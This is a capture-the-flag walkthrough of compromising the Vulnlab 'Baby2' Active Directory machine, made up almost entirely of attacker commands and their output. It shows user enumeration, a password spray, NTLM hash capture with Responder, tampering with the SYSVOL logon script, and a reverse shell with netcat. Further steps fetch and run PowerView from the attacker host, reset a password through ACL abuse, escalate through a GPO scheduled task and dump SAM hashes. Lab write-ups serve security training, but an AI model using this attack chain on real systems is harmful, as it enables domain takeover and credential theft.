Baby2 is an medium Windows machine on Vulnlab
https://wiki.vulnlab.com/intro/lab-access
Tools used : kerbrute_linux , crackmapexec , responder , smbclient , bloodhound-python , pygpoabuse.py , evil-winrm , impacket-secretsdump
After the nmap scan, we add to our /etc/hosts
110.10.107.115 dc.baby2.vl baby2.vl
SMB enumeration
┌──(puck㉿kali)-[~/vulnlab/baby2] └─$ ./kerbrute_linux_386 userenum -d baby2.vl --dc 10.10.107.115 ./users.txt -v __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 06/05/24 - Ronnie Flathers @ropnop 2024/06/05 10:51:32 > Using KDC(s): 2024/06/05 10:51:32 > 10.10.107.115:88 2024/06/05 10:51:32 > [+] VALID USERNAME: Joan.Jennings@baby2.vl 2024/06/05 10:51:32 > [!] library @baby2.vl - User does not exist 2024/06/05 10:51:32 > [+] VALID USERNAME: Mohammed.Harris@baby2.vl 2024/06/05 10:51:32 > [+] VALID USERNAME: Kieran.Mitchell@baby2.vl 2024/06/05 10:51:32 > [+] VALID USERNAME: Harry.Shaw@baby2.vl 2024/06/05 10:51:32 > [+] VALID USERNAME: Amelia.Griffiths@baby2.vl 2024/06/05 10:51:32 > [+] VALID USERNAME: Carl.Moore@baby2.vl 2024/06/05 10:51:32 > [!] Joel.Hurst @baby2.vl - User does not exist 2024/06/05 10:51:32 > [!] Nicola.Lamb @baby2.vl - User does not exist 2024/06/05 10:51:32 > [!] Lynda.Bailey @baby2.vl - User does not exist 2024/06/05 10:51:33 > [+] VALID USERNAME: Ryan.Jenkins@baby2.vl 2024/06/05 10:51:33 > Done! Tested 11 usernames (7 valid) in 0.046 seconds
.
┌──(puck㉿kali)-[~/vulnlab/baby2] └─$ crackmapexec smb baby2.vl -u 'users.txt' -p 'users.txt' --no-bruteforce --continue-on-success SMB dc.baby2.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) SMB dc.baby2.vl 445 DC [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE SMB dc.baby2.vl 445 DC [+] baby2.vl\Carl.Moore:Carl.Moore SMB dc.baby2.vl 445 DC [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE SMB dc.baby2.vl 445 DC [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE SMB dc.baby2.vl 445 DC [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE SMB dc.baby2.vl 445 DC [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE SMB dc.baby2.vl 445 DC [+] baby2.vl\library:library SMB dc.baby2.vl 445 DC [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE SMB dc.baby2.vl 445 DC [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE SMB dc.baby2.vl 445 DC [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE SMB dc.baby2.vl 445 DC [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE
.
┌──(puck㉿kali)-[~/vulnlab/baby2] sudo responder -I tun0 __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.1.4.0 To support this project: Github -> https://github.com/sponsors/lgandx Paypal -> https://paypal.me/PythonResponder --snip-- [+] Generic Options: Responder NIC [tun0] Responder IP [10.8.2.138] Responder IPv6 [fe80::649e:d175:8068:bcd1] Challenge set [random] Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL'] [+] Current Session Variables: Responder Machine Name [WIN-4JOEGPTIY13] Responder Domain Name [VHTD.LOCAL] Responder DCE-RPC Port [45034] [+] Listening for events... [SMB] NTLMv1-SSP Client : 10.10.107.115 [SMB] NTLMv1-SSP Username : BABY2\Amelia.Griffiths [SMB] NTLMv1-SSP Hash : Amelia.Griffiths::BABY2:209A2B76B00AD43400000000000000000000000000000000:3396018DE3FBCDC60DDC06D5C83119BA2C907D2EE4041103:fe87a8a485cea873 [*] Skipping previously captured hash for BABY2\Amelia.Griffiths [*] Skipping previously captured hash for BABY2\Amelia.Griffiths [*] Skipping previously captured hash for BABY2\Amelia.Griffiths
.
Download login.vbs, modify it to below and then upload it
┌──(puck㉿kali)-[~/vulnlab/baby2] └─$ smbclient //baby2.vl/SYSVOL -U Carl.Moore Password for [WORKGROUP\Carl.Moore]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Aug 22 19:37:36 2023 .. D 0 Tue Aug 22 19:37:36 2023 baby2.vl Dr 0 Tue Aug 22 19:37:36 2023 6126847 blocks of size 4096. 1960515 blocks available smb: \> cd baby2.vl smb: \baby2.vl\> ls . D 0 Tue Aug 22 19:43:55 2023 .. D 0 Tue Aug 22 19:37:36 2023 DfsrPrivate DHSr 0 Tue Aug 22 19:43:55 2023 Policies D 0 Tue Aug 22 19:37:41 2023 scripts D 0 Tue Aug 22 21:28:27 2023 6126847 blocks of size 4096. 1960512 blocks available smb: \baby2.vl\> cd scripts smb: \baby2.vl\scripts\> ls . D 0 Tue Aug 22 21:28:27 2023 .. D 0 Tue Aug 22 19:43:55 2023 login.vbs A 992 Sat Sep 2 16:55:51 2023 6126847 blocks of size 4096. 1960216 blocks available smb: \baby2.vl\scripts\> get login.vbs getting file \baby2.vl\scripts\login.vbs of size 992 as login.vbs (6.5 KiloBytes/sec) (average 6.5 KiloBytes/sec) smb: \baby2.vl\scripts\> ls . D 0 Tue Aug 22 21:28:27 2023 .. D 0 Tue Aug 22 19:43:55 2023 login.vbs A 992 Sat Sep 2 16:55:51 2023 6126847 blocks of size 4096. 1980334 blocks available smb: \baby2.vl\scripts\> put login.vbs putting file login.vbs as \baby2.vl\scripts\login.vbs (19.4 kb/s) (average 19.4 kb/s) smb: \baby2.vl\scripts\> ls . D 0 Tue Aug 22 21:28:27 2023 .. D 0 Tue Aug 22 19:43:55 2023 login.vbs A 1190 Thu Jun 6 10:42:19 2024 6126847 blocks of size 4096. 1980332 blocks available smb: \baby2.vl\scripts\>
.
.
┌──(puck㉿kali)-[~/vulnlab/baby2] └─$ bloodhound-python -d 'baby2.vl' -u 'library' -p 'library' -c all -ns 10.10.97.10 INFO: Found AD domain: baby2.vl INFO: Getting TGT for user INFO: Connecting to LDAP server: dc.baby2.vl INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc.baby2.vl INFO: Found 16 users INFO: Found 54 groups INFO: Found 2 gpos INFO: Found 3 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.baby2.vl INFO: Done in 00M 06S
.
Catch the shell
──(puck㉿kali)-[~/vulnlab/baby2] └─$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.121.13 - - [06/Jun/2024 10:42:58] "GET /Invoke-ConPtyShell.ps1 HTTP/1.1" 200 - 10.10.121.13 - - [06/Jun/2024 10:53:49] "GET /nc.exe HTTP/1.1" 200 - 10.10.121.13 - - [06/Jun/2024 10:53:49] "GET /nc.exe HTTP/1.1" 200 - 10.10.121.13 - - [06/Jun/2024 10:54:49] "GET /nc.exe HTTP/1.1" 200 - 10.10.121.13 - - [06/Jun/2024 10:54:49] "GET /nc.exe HTTP/1.1" 200 -
.
┌──(puck㉿kali)-[~/vulnlab/baby2] └─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.121.13] 54867 Microsoft Windows [Version 10.0.20348.1906] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami baby2\amelia.griffiths C:\Windows\system32>cd c:\temp cd c:\temp c:\temp>dir dir Volume in drive C has no label. Volume Serial Number is E6F3-2485 Directory of c:\temp 06/06/2024 01:53 AM <DIR> . 06/06/2024 01:53 AM 45,272 nc.exe 1 File(s) 45,272 bytes 1 Dir(s) 8,262,537,216 bytes free c:\temp>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\temp> iex (iwr -usebasicparsing http://10.8.2.138:8000/PowerView.ps1) PS C:\temp> add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths" PS C:\temp> $cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force PS C:\temp> set-domainuserpassword gpoadm -accountpassword $cred PS C:\temp>
Check if o.k.
┌──(puck㉿kali)-[~/vulnlab/baby2] └─$ crackmapexec smb baby2.vl -u 'gpoadm' -p 'Password123!' --no-bruteforce --continue-on-success SMB dc.baby2.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) SMB dc.baby2.vl 445 DC [+] baby2.vl\gpoadm:Password123! ┌──(puck㉿kali)-[~/vulnlab/baby2]
.
Using pyGPOAbuse, we can create an immediate scheduled task which will get executed as SYSTEM user to add gpoadm in local administrators group (for this I had to use python virtual environment as some dependencies were causing an issue with the current version of impacket), we’ll need the GPO ID for creating the task
.
┌──(puck㉿kali)-[~/vulnhub/baby2] └─$ git clone https://github.com/Hackndo/pyGPOAbuse.git Cloning into 'pyGPOAbuse' ┌──(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse] └─$ python3 -m venv venv ┌──(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse] └─$ source venv/bin/activate ┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse] └─$ ls assets LICENSE pygpoabuse pygpoabuse.py README.md requirements.txt venv ┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse] └─$ pip3 install -r requirements.txt Collecting msldap (from -r requirements.txt (line 1)) ┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse] └─$ python3 pygpoabuse.py 'baby2.vl/gpoadm:Password123!' -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -f -dc-ip 10.10.71.85 -command 'net localgroup administrators /add gpoadm' SUCCESS:root:ScheduledTask TASK_60bdad92 created! [+] ScheduledTask TASK_60bdad92 created!
now we are admin
PS C:\temp> net user gpoadm net user gpoadm User name gpoadm Full Name gpoadm Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/6/2024 7:16:03 AM Password expires Never Password changeable 6/7/2024 7:16:03 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *Domain Users The command completed successfully. PS C:\temp> ┌──(puck㉿kali)-[~/vulnhub/baby2] └─$ evil-winrm -i baby2.vl -u 'gpoadm' -p 'Password123!' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\gpoadm\Documents> whoami baby2\gpoadm *Evil-WinRM* PS C:\Users\gpoadm\Documents>
.
Beyond root
┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ xfreerdp /v:10.10.74.17 -sec-nla
┌──(puck㉿kali)-[~/vulnhub/baby2] └─$ impacket-secretsdump baby2.vl/gpoadm:'Password123!'@10.10.74.17 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0x34170b414576a40142e3edc4911d859d [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: *Evil-WinRM* PS C:\Users\Administrator\Documents> net user administrator Password123! The command completed successfully. ┌──(puck㉿kali)-[~/vulnhub/baby2] └─$ xfreerdp /v:10.10.74.17 -sec-nla
.
c:\windows\system32\tasks\logonsim
<?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2023-08-22T12:48:15.1312495</Date> <Author>BABY2\Administrator</Author> <URI>\logonsim</URI> </RegistrationInfo> <Triggers> <LogonTrigger> <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Enabled>true</Enabled> <UserId>BABY2\Amelia.Griffiths</UserId> <Delay>PT2M</Delay> </LogonTrigger> </Triggers> <Principals> <Principal id="Author"> <RunLevel>LeastPrivilege</RunLevel> <UserId>BABY2\Amelia.Griffiths</UserId> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command> <Arguments>\windows\logon.ps1</Arguments> </Exec> </Actions> </Task>
c:\windows\login.ps1
cscript //X \\baby2.vl\SYSVOL\baby2.vl\scripts\login.vbs
.
.